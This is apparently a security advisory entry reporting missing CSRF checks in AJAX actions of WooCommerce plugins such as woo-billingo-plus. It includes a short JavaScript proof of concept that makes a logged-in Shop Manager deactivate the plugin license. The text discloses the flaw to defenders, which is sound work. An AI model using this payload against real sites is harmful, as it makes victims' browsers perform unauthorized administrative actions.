The plugins are lacking CSRF checks in various AJAX actions, which could allow attackers to make logged in Shop Managers and above perform unwanted actions, such as deactivate the plugin's license
With the woo-billingo-plus plugin installed, make a logged in user with the edit_shop_orders capability open a page containing the below JS code fetch('https://example.com/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=wc_billingo_plus_license_deactivate', redirect: 'follow' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); For other plugins, juts change the action parameter accordingly
Lana Codes
Lana Codes
Yes
2022-09-14 (about 1 years ago)
2022-09-14 (about 1 years ago)
2022-10-20 (about 11 months ago)